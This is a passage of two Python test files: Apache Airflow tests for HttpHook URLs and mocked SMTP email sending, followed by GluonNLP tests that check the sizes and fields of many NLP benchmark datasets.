def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_subtype='mixed'
)
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.get('smtp', 'SMTP_USER'),
configuration.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
test_datasets.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import os
import io
import random
import warnings
import threading
from flaky import flaky
import mxnet as mx
import numpy as np
import pytest
import gluonnlp as nlp
from mxnet.gluon.data import SimpleDataset
###############################################################################
# Registry
###############################################################################
@pytest.mark.serial
def test_dataset_registry():
@nlp.data.register(segment=['train'])
class MyDataset(mx.gluon.data.Dataset):
def __init__(self, segment='train'):
pass
my_dataset = nlp.data.create('MyDataset')
with pytest.raises(RuntimeError):
@nlp.data.register(segment='thisshouldbealistofarguments')
class MyDataset2(mx.gluon.data.Dataset):
def __init__(self, segment='train'):
pass
with pytest.raises(RuntimeError):
@nlp.data.register(invalidargument=['train'])
class MyDataset3(mx.gluon.data.Dataset):
def __init__(self, segment='train'):
pass
@nlp.data.register()
class MyDataset4(mx.gluon.data.Dataset):
def __init__(self, segment='train'):
pass
my_dataset = nlp.data.create('MyDataset4')
@nlp.data.register
class MyDataset5(mx.gluon.data.Dataset):
def __init__(self, segment='train'):
pass
my_dataset = nlp.data.create('MyDataset5')
###############################################################################
# Sentiment analysis
###############################################################################
@pytest.mark.serial
@pytest.mark.remote_required
def test_imdb():
train = nlp.data.IMDB(segment='train')
test = nlp.data.IMDB(segment='test')
unsup = nlp.data.IMDB(segment='unsup')
assert len(train) == 25000, len(train)
assert len(test) == 25000, len(test)
assert len(unsup) == 50000, len(unsup)
for i, (data, score) in enumerate(train):
assert isinstance(data, str)
assert score <= 4 or score >= 7
for i, (data, score) in enumerate(test):
assert isinstance(data, str)
assert score <= 4 or score >= 7
for i, (data, score) in enumerate(unsup):
assert isinstance(data, str)
assert score == 0
@pytest.mark.serial
@pytest.mark.remote_required
def test_mr():
all = nlp.data.MR()
assert len(all) == 10662, len(all)
for i, (data, label) in enumerate(all):
assert isinstance(data, str)
assert label <= 1
@pytest.mark.serial
@pytest.mark.remote_required
def test_sst_1():
train = nlp.data.SST_1(segment='train')
test = nlp.data.SST_1(segment='test')
dev = nlp.data.SST_1(segment='dev')
assert len(train) == 156817, len(train)
assert len(test) == 2210, len(test)
assert len(dev) == 1101, len(dev)
for i, (data, label) in enumerate(train):
assert isinstance(data, str)
assert label <= 4
for i, (data, label) in enumerate(test):
assert isinstance(data, str)
assert label <= 4
for i, (data, label) in enumerate(dev):
assert isinstance(data, str)
assert label <= 4
@pytest.mark.serial
@pytest.mark.remote_required
def test_sst_2():
train = nlp.data.SST_2(segment='train')
test = nlp.data.SST_2(segment='test')
dev = nlp.data.SST_2(segment='dev')
assert len(train) == 76961, len(train)
assert len(test) == 1821, len(test)
assert len(dev) == 872, len(dev)
for i, (data, label) in enumerate(train):
assert isinstance(data, str)
assert label <= 1
for i, (data, label) in enumerate(test):
assert isinstance(data, str)
assert label <= 1
for i, (data, label) in enumerate(dev):
assert isinstance(data, str)
assert label <= 1
@pytest.mark.serial
@pytest.mark.remote_required
def test_subj():
all = nlp.data.SUBJ()
assert len(all) == 10000, len(all)
for i, (data, label) in enumerate(all):
assert isinstance(data, str)
assert label <= 1
@pytest.mark.serial
@pytest.mark.remote_required
def test_trec():
train = nlp.data.TREC(segment='train')
test = nlp.data.TREC(segment='test')
assert len(train) == 5452, len(train)
assert len(test) == 500, len(test)
for i, (data, label) in enumerate(train):
assert isinstance(data, str)
assert label <= 5
for i, (data, label) in enumerate(test):
assert isinstance(data, str)
assert label <= 5
@pytest.mark.serial
@pytest.mark.remote_required
def test_cr():
all = nlp.data.CR()
assert len(all) == 3775, len(all)
for i, (data, label) in enumerate(all):
assert isinstance(data, str)
assert label <= 1
@pytest.mark.serial
@pytest.mark.remote_required
def test_mpqa():
all = nlp.data.MPQA()
assert len(all) == 10606, len(all)
for i, (data, label) in enumerate(all):
assert isinstance(data, str)
assert label <= 1
###############################################################################
# Word similarity and relatedness datasets
###############################################################################
def _assert_similarity_dataset(data):
# Check datatypes
assert isinstance(data[0][0], str)
assert isinstance(data[0][1], str)
assert np.isfinite(data[0][2])
# Check score magnitude
assert all(data.min <= row[2] <= data.max for row in data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.parametrize('segment,length', [('all', 352), ('relatedness', 252),
('similarity', 203)])
@pytest.mark.serial
@pytest.mark.remote_required
def test_wordsim353(segment, length):
# 'all' has length 352 as the original dataset contains the 'money/cash'
# pair twice with different similarity ratings, which was fixed by the
# http://alfonseca.org/eng/research/wordsim353.html version of the dataset
# that we are using.
data = nlp.data.WordSim353(segment=segment)
assert len(data) == length, len(data)
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@pytest.mark.serial
@pytest.mark.remote_required
def test_men():
for segment, length in [("full", 3000), ("dev", 2000), ("test", 1000)]:
data = nlp.data.MEN(segment=segment)
assert len(data) == length, len(data)
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_radinsky_mturk():
data = nlp.data.RadinskyMTurk()
assert len(data) == 287
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_verb143():
data = nlp.data.BakerVerb143()
assert len(data) == 144
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
def test_verb130():
data = nlp.data.YangPowersVerb130()
assert len(data) == 130
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_rare_words():
data = nlp.data.RareWords()
assert len(data) == 2034
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_simlex999():
data = nlp.data.SimLex999()
assert len(data) == 999
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_simverb3500():
data = nlp.data.SimVerb3500()
assert len(data) == 3500
_assert_similarity_dataset(data)
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
@pytest.mark.skipif(datetime.date.today() < datetime.date(2019, 11, 21), reason='website down')
def test_semeval17task2():
for segment, length in [("trial", 18), ("test", 500)]:
data = nlp.data.SemEval17Task2(segment=segment)
assert len(data) == length
_assert_similarity_dataset(data)
###############################################################################
# Word analogy datasets
###############################################################################
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_googleanalogy():
data = nlp.data.GoogleAnalogyTestSet()
assert len(data[0]) == 4
assert len(data) == 10675 + 8869
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_bigger_analogy():
data = nlp.data.BiggerAnalogyTestSet()
assert len(data[0]) == 4
assert len(data) == 98000
###############################################################################
# CONLL
###############################################################################
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_conll2000():
train = nlp.data.CoNLL2000(segment='train')
test = nlp.data.CoNLL2000(segment='test')
assert len(train) == 8936, len(train)
assert len(test) == 2012, len(test)
for i, (data, pos, chk) in enumerate(train):
assert all(isinstance(d, str) for d in data), data
assert all(isinstance(p, str) for p in pos), pos
assert all(isinstance(c, str) for c in chk), chk
for i, (data, pos, chk) in enumerate(test):
assert all(isinstance(d, str) for d in data), data
assert all(isinstance(p, str) for p in pos), pos
assert all(isinstance(c, str) for c in chk), chk
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_conll2001():
for part in range(1, 4):
train = nlp.data.CoNLL2001(part, segment='train')
testa = nlp.data.CoNLL2001(part, segment='testa')
testb = nlp.data.CoNLL2001(part, segment='testb')
assert len(train) == 8936, len(train)
assert len(testa) == 2012, len(testa)
assert len(testb) == 1671, len(testb)
for dataset in [train, testa, testb]:
for i, (data, pos, chk, clause) in enumerate(dataset):
assert all(isinstance(d, str) for d in data), data
assert all(isinstance(p, str) for p in pos), pos
assert all(isinstance(c, str) for c in chk), chk
assert all(isinstance(i, str) for i in clause), clause
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.parametrize('segment,length', [
('train', 15806),
('testa', 2895),
('testb', 5195),
])
@pytest.mark.serial
@pytest.mark.remote_required
def test_conll2002_ned(segment, length):
dataset = nlp.data.CoNLL2002('ned', segment=segment)
assert len(dataset) == length, len(dataset)
for i, (data, pos, ner) in enumerate(dataset):
assert all(isinstance(d, str) for d in data), data
assert all(isinstance(p, str) for p in pos), pos
assert all(isinstance(n, str) for n in ner), ner
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.parametrize('segment,length', [
('train', 8323),
('testa', 1915),
('testb', 1517),
])
@pytest.mark.serial
@pytest.mark.remote_required
def test_conll2002_esp(segment, length):
dataset = nlp.data.CoNLL2002('esp', segment=segment)
assert len(dataset) == length, len(dataset)
for i, (data, ner) in enumerate(dataset):
assert all(isinstance(d, str) for d in data), data
assert all(isinstance(n, str) for n in ner), ner
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.parametrize('segment,length', [
('train', 8936),
('dev', 2012),
('test', 1671),
])
@pytest.mark.serial
@pytest.mark.remote_required
def test_conll2004(segment, length):
dataset = nlp.data.CoNLL2004(segment=segment)
assert len(dataset) == length, len(dataset)
for i, x in enumerate(dataset):
assert len(x) >= 6, x
assert all(isinstance(d, str) for f in x for d in f), x
assert max(len(f) for f in x) == min(len(f) for f in x), x
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@flaky(max_runs=2, min_passes=1)
@pytest.mark.serial
@pytest.mark.remote_required
def test_ud21():
test_langs = list(nlp._constants.UD21_DATA_FILE_SHA1.items())
random.shuffle(test_langs)
test_langs = test_langs[:30]
for lang, segments in test_langs:
segment = list(segments.keys())
random.shuffle(segment)
segment = segment[0]
dataset = nlp.data.UniversalDependencies21(
lang=lang, segment=segment)
print('processing {}: {}'.format(lang, segment))
for i, x in enumerate(dataset):
assert len(x) >= 9, x
assert all(isinstance(d, str) for f in x for d in f), x
assert max(len(f) for f in x) == min(len(f) for f in x)
###############################################################################
# Translation
###############################################################################
@pytest.mark.serial
@pytest.mark.remote_required
def test_iwlst2015():
# Test en to vi
train_en_vi = nlp.data.IWSLT2015(segment='train')
val_en_vi = nlp.data.IWSLT2015(segment='val')
test_en_vi = nlp.data.IWSLT2015(segment='test')
assert len(train_en_vi) == 133166
assert len(val_en_vi) == 1553
assert len(test_en_vi) == 1268
with warnings.catch_warnings(): # TODO https://github.com/dmlc/gluon-nlp/issues/978
warnings.simplefilter("ignore")
en_vocab, vi_vocab = train_en_vi.src_vocab, train_en_vi.tgt_vocab
assert len(en_vocab) == 17191
assert len(vi_vocab) == 7709
train_vi_en = nlp.data.IWSLT2015(segment='train', src_lang='vi', tgt_lang='en')
with warnings.catch_warnings(): # TODO https://github.com/dmlc/gluon-nlp/issues/978
warnings.simplefilter("ignore")
vi_vocab, en_vocab = train_vi_en.src_vocab, train_vi_en.tgt_vocab
assert len(en_vocab) == 17191
assert len(vi_vocab) == 7709
for i in range(10):
lhs = train_en_vi[i]
rhs = train_vi_en[i]
assert lhs[0] == rhs[1] and rhs[0] == lhs[1]
@pytest.mark.serial
@pytest.mark.remote_required
def test_wmt2016():
train = nlp.data.WMT2016(segment='train', src_lang='en', tgt_lang='de')
newstests = [nlp.data.WMT2016(segment='newstest%d' %i, src_lang='en', tgt_lang='de')
for i in range(2012, 2017)]
assert len(train) == 4549428
assert tuple(len(ele) for ele in newstests) == (3003, 3000, 3003, 2169, 2999)
newstest_2012_2015 = nlp.data.WMT2016(segment=['newstest%d' %i for i in range(2012, 2016)],
src_lang='en', tgt_lang='de')
assert len(newstest_2012_2015) == 3003 + 3000 + 3003 + 2169
@pytest.mark.serial
@pytest.mark.remote_required
def test_wmt2016bpe():
train = nlp.data.WMT2016BPE(segment='train', src_lang='en', tgt_lang='de')
newstests = [nlp.data.WMT2016BPE(segment='newstest%d' %i, src_lang='en', tgt_lang='de')
for i in range(2012, 2017)]
assert len(train) == 4500966
assert tuple(len(ele) for ele in newstests) == (3003, 3000, 3003, 2169, 2999)
newstest_2012_2015 = nlp.data.WMT2016BPE(segment=['newstest%d' %i for i in range(2012, 2016)],
src_lang='en', tgt_lang='de')
assert len(newstest_2012_2015) == 3003 + 3000 + 3003 + 2169
with warnings.catch_warnings(): # TODO https://github.com/dmlc/gluon-nlp/issues/978
warnings.simplefilter("ignore")
en_vocab, de_vocab = train.src_vocab, train.tgt_vocab
assert len(en_vocab) == 36548
assert len(de_vocab) == 36548
@pytest.mark.serial
@pytest.mark.remote_required
def test_wmt2014():
train = nlp.data.WMT2014(segment='train', src_lang='en', tgt_lang='de')
newstests = [nlp.data.WMT2014(segment='newstest%d' %i, src_lang='en', tgt_lang='de')
for i in range(2009, 2015)]
assert len(train) == 4509333
assert tuple(len(ele) for ele in newstests) == (2525, 2489, 3003, 3003, 3000, 2737)
newstest_2009_2013 = nlp.data.WMT2014(segment=['newstest%d' %i for i in range(2009, 2014)],
src_lang='en', tgt_lang='de')
assert len(newstest_2009_2013) == 2525 + 2489 + 3003 + 3003 + 3000
newstest_2014 = nlp.data.WMT2014(segment='newstest2014', src_lang='de', tgt_lang='en')
assert len(newstest_2014) == 3003
newstest_2014 = nlp.data.WMT2014(segment='newstest2014', src_lang='de', tgt_lang='en', full=True)
assert len(newstest_2014) == 3003
@pytest.mark.serial
@pytest.mark.remote_required
def test_wmt2014bpe():
train = nlp.data.WMT2014BPE(segment='train', src_lang='en', tgt_lang='de')
newstests = [nlp.data.WMT2014BPE(segment='newstest%d' %i, src_lang='en', tgt_lang='de')
for i in range(2009, 2015)]
assert len(train) == 4493328
assert tuple(len(ele) for ele in newstests) == (2525, 2489, 3003, 3003, 3000, 2737)
newstest_2009_2013 = nlp.data.WMT2014BPE(segment=['newstest%d' %i for i in range(2009, 2014)],
src_lang='en', tgt_lang='de')
assert len(newstest_2009_2013) == 2525 + 2489 + 3003 + 3003 + 3000
with warnings.catch_warnings(): # TODO https://github.com/dmlc/gluon-nlp/issues/978
warnings.simplefilter("ignore")
en_vocab, de_vocab = train.src_vocab, train.tgt_vocab
assert len(en_vocab) == 36794
assert len(de_vocab) == 36794
newstest_2014 = nlp.data.WMT2014BPE(segment='newstest2014', src_lang='de', tgt_lang='en')
assert len(newstest_2014) == 3003
newstest_2014 = nlp.data.WMT2014BPE(segment='newstest2014', src_lang='de', tgt_lang='en', full=True)
assert len(newstest_2014) == 3003
###############################################################################
# Question answering
###############################################################################
@pytest.mark.serial
@pytest.mark.remote_required
def test_load_dev_squad():
# number of records in dataset is equal to number of different questions
train_dataset = nlp.data.SQuAD(segment='train', version='1.1')
assert len(train_dataset) == 87599
val_dataset = nlp.data.SQuAD(segment='dev',version='1.1')
assert len(val_dataset) == 10570
# Each record is a tuple of 6 elements: record_id, question Id, question, context,
# list of answer texts, list of answer start indices
for record in val_dataset:
assert len(record) == 6
train_dataset_2 = nlp.data.SQuAD(segment='train', version='2.0')
assert len(train_dataset_2) == 130319
val_dataset = nlp.data.SQuAD(segment='dev', version='2.0')
assert len(val_dataset) == 11873
# Each record is a tuple of 7 elements: record_id, question Id, question, context,
# list of answer texts, list of answer start indices, is_impossible
for record in val_dataset:
assert len(record) == 7
###############################################################################
# Intent Classification and Slot Labeling
###############################################################################
@pytest.mark.serial
@pytest.mark.remote_required
@pytest.mark.parametrize('dataset,segment,expected_samples', [
('atis', 'train', 4478),
('atis', 'dev', 500),
('atis', 'test', 893),
('snips', 'train', 13084),
('snips', 'dev', 700),
('snips', 'test', 700)])
def test_intent_slot(dataset, segment, expected_samples):
assert dataset in ['atis', 'snips']
if dataset == 'atis':
data_cls = nlp.data.ATISDataset
else:
data_cls = nlp.data.SNIPSDataset
dataset = data_cls(segment=segment)
assert len(dataset) == expected_samples
assert len(dataset[0]) == 3
assert all(len(x[0]) == len(x[1]) for x in dataset)
def test_counter():
x = nlp.data.Counter({'a': 10, 'b': 1, 'c': 1})
y = x.discard(3, '<unk>')
assert y['a'] == 10
assert y['<unk>'] == 2
# this test is not tested on CI due to long running time
def _test_gbw_stream():
gbw = nlp.data.GBWStream()
counter = nlp.data.Counter(gbw)
counter.discard(3, '<unk>')
# reference count obtained from:
# https://github.com/rafaljozefowicz/lm/blob/master/1b_word_vocab.txt
assert counter['the'] == 35936573
assert counter['.'] == 29969612
vocab = gbw.vocab
assert len(vocab) == 793471
def test_concatenation():
datasets = [
SimpleDataset([1,2,3,4]),
SimpleDataset([5,6]),
SimpleDataset([8,0,9]),
]
dataset = nlp.data.ConcatDataset(datasets)
assert len(dataset) == 9
assert dataset[0] == 1
assert dataset[5] == 6
def test_tsv():
data = "a,b,c\n"
data += "d,e,f\n"
data += "g,h,i\n"
with open('test_tsv.tsv', 'w') as fout:
fout.write(data)
num_discard = 1
field_separator = nlp.data.utils.Splitter(',')
field_indices = [0,2]
dataset = nlp.data.TSVDataset('test_tsv.tsv', num_discard_samples=num_discard,
field_separator=field_separator,
field_indices=field_indices)
num_samples = 3 - num_discard
idx = random.randint(0, num_samples - 1)
assert len(dataset) == num_samples
assert len(dataset[0]) == 2
assert dataset[1] == [u'g', u'i']
def test_numpy_dataset():
a = np.arange(6).reshape((2,3))
filename = 'test_numpy_dataset'
# test npy
np.save(filename, a)
dataset = nlp.data.NumpyDataset(filename + '.npy')
assert dataset.keys is None
assert len(dataset) == len(a)
assert np.all(dataset[0] == a[0])
assert np.all(dataset[1] == a[1])
# test npz with a single array
np.savez(filename, a)
dataset = nlp.data.NumpyDataset(filename + '.npz')
assert len(dataset) == len(a)
assert np.all(dataset[0] == a[0])
assert np.all(dataset[1] == a[1])
# test npz with multiple arrays
b = np.arange(16).reshape((2,8))
np.savez(filename, a=a, b=b)
dataset = nlp.data.NumpyDataset(filename + '.npz')
assert dataset.keys == ['a', 'b']
assert len(dataset) == len(a)
assert np.all(dataset[0][0] == a[0])
assert np.all(dataset[1][0] == a[1])
assert np.all(dataset[0][1] == b[0])
assert np.all(dataset[1][1] == b[1])
dataset_b = dataset.get_field('b')
assert np.all(dataset_b == b)
@pytest.mark.parametrize('cls,name,segment,length,fields', [
(nlp.data.GlueCoLA, 'cola', 'train', 8551, 2),
(nlp.data.GlueCoLA, 'cola', 'dev', 1043, 2),
(nlp.data.GlueCoLA, 'cola', 'test', 1063, 1),
# source: https://arxiv.org/pdf/1804.07461.pdf
(nlp.data.GlueSST2, 'sst', 'train', 67349, 2),
(nlp.data.GlueSST2, 'sst', 'dev', 872, 2),
(nlp.data.GlueSST2, 'sst', 'test', 1821, 1),
# source: http://ixa2.si.ehu.es/stswiki/index.php/STSbenchmark
(nlp.data.GlueSTSB, 'sts', 'train', 5749, 3),
(nlp.data.GlueSTSB, 'sts', 'dev', 1500, 3),
(nlp.data.GlueSTSB, 'sts', 'test', 1379, 2),
# source: https://data.quora.com/First-Quora-Dataset-Release-Question-Pairs
(nlp.data.GlueQQP, 'qqp', 'train', 363849, 3),
(nlp.data.GlueQQP, 'qqp', 'dev', 40430, 3),
(nlp.data.GlueQQP, 'qqp', 'test', 390965, 2),
# source: http://www.nyu.edu/projects/bowman/multinli/paper.pdf
(nlp.data.GlueMNLI, 'mnli', 'train', 392702, 3),
(nlp.data.GlueMNLI, 'mnli', 'dev_matched', 9815, 3),
(nlp.data.GlueMNLI, 'mnli', 'dev_mismatched', 9832, 3),
(nlp.data.GlueMNLI, 'mnli', 'test_matched', 9796, 2),
(nlp.data.GlueMNLI, 'mnli', 'test_mismatched', 9847, 2),
# source: https://arxiv.org/pdf/1804.07461.pdf
(nlp.data.GlueRTE, 'rte', 'train', 2490, 3),
(nlp.data.GlueRTE, 'rte', 'dev', 277, 3),
(nlp.data.GlueRTE, 'rte', 'test', 3000, 2),
# source: https://arxiv.org/pdf/1804.07461.pdf
(nlp.data.GlueQNLI, 'qnli', 'train', 108436, 3),
(nlp.data.GlueQNLI, 'qnli', 'dev', 5732, 3),
(nlp.data.GlueQNLI, 'qnli', 'test', 5740, 2),
# source: https://arxiv.org/pdf/1804.07461.pdf
(nlp.data.GlueWNLI, 'wnli', 'train', 635, 3),
(nlp.data.GlueWNLI, 'wnli', 'dev', 71, 3),
(nlp.data.GlueWNLI, 'wnli', 'test', 146, 2),
(nlp.data.GlueMRPC, 'mrpc', 'train', 3668, 3),
(nlp.data.GlueMRPC, 'mrpc', 'dev', 408, 3),
(nlp.data.GlueMRPC, 'mrpc', 'test', 1725, 2),
])
@pytest.mark.skipif(datetime.date.today().weekday() != 0, reason='connection refused')
@pytest.mark.serial
@pytest.mark.remote_required
def test_glue_data(cls, name, segment, length, fields):
with warnings.catch_warnings():
if cls is nlp.data.GlueQQP: # QQP contains incomplete samples and raises warnings
warnings.simplefilter("ignore")
dataset = cls(segment=segment)
assert len(dataset) == length, len(dataset)
for i, x in enumerate(dataset):
assert len(x) == fields, x
@pytest.mark.parametrize('cls,name,segment,length,fields', [
(nlp.data.SuperGlueRTE, 'rte', 'train', 2490, 4),
(nlp.data.SuperGlueRTE, 'rte', 'val', 277, 4),
(nlp.data.SuperGlueRTE, 'rte', 'test', 3000, 3),
(nlp.data.SuperGlueCB, 'cb', 'train', 250, 4),
(nlp.data.SuperGlueCB, 'cb', 'val', 56, 4),
(nlp.data.SuperGlueCB, 'cb', 'test', 250, 3),
(nlp.data.SuperGlueWSC, 'wsc', 'train', 554, 4),
(nlp.data.SuperGlueWSC, 'wsc', 'val', 104, 4),
(nlp.data.SuperGlueWSC, 'wsc', 'test', 146, 3),
(nlp.data.SuperGlueWiC, 'wic', 'train', 5428, 10),
(nlp.data.SuperGlueWiC, 'wic', 'val', 638, 10),
(nlp.data.SuperGlueWiC, 'wic', 'test', 1400, 9),
(nlp.data.SuperGlueCOPA, 'copa', 'train', 400, 6),
(nlp.data.SuperGlueCOPA, 'copa', 'val', 100, 6),
(nlp.data.SuperGlueCOPA, 'copa', 'test', 500, 5),
(nlp.data.SuperGlueMultiRC, 'multirc', 'train', 456, 2),
(nlp.data.SuperGlueMultiRC, 'multirc', 'val', 83, 2),
(nlp.data.SuperGlueMultiRC, 'multirc', 'test', 166, 2),
(nlp.data.SuperGlueBoolQ, 'boolq', 'train', 9427, 4),
(nlp.data.SuperGlueBoolQ, 'boolq', 'val', 3270, 4),
(nlp.data.SuperGlueBoolQ, 'boolq', 'test', 3245, 3),
(nlp.data.SuperGlueReCoRD, 'record', 'train', 65709, 4),
(nlp.data.SuperGlueReCoRD, 'record', 'val', 7481, 4),
(nlp.data.SuperGlueReCoRD, 'record', 'test', 7484, 4),
# in AX-b dataset, number of fields may differ
(nlp.data.SuperGlueAXb, 'ax_b', None, 1104, None),
(nlp.data.SuperGlueAXg, 'ax_g', None, 356, 5),
])
@pytest.mark.serial
@pytest.mark.remote_required
def test_superglue_data(cls, name, segment, length, fields):
if segment:
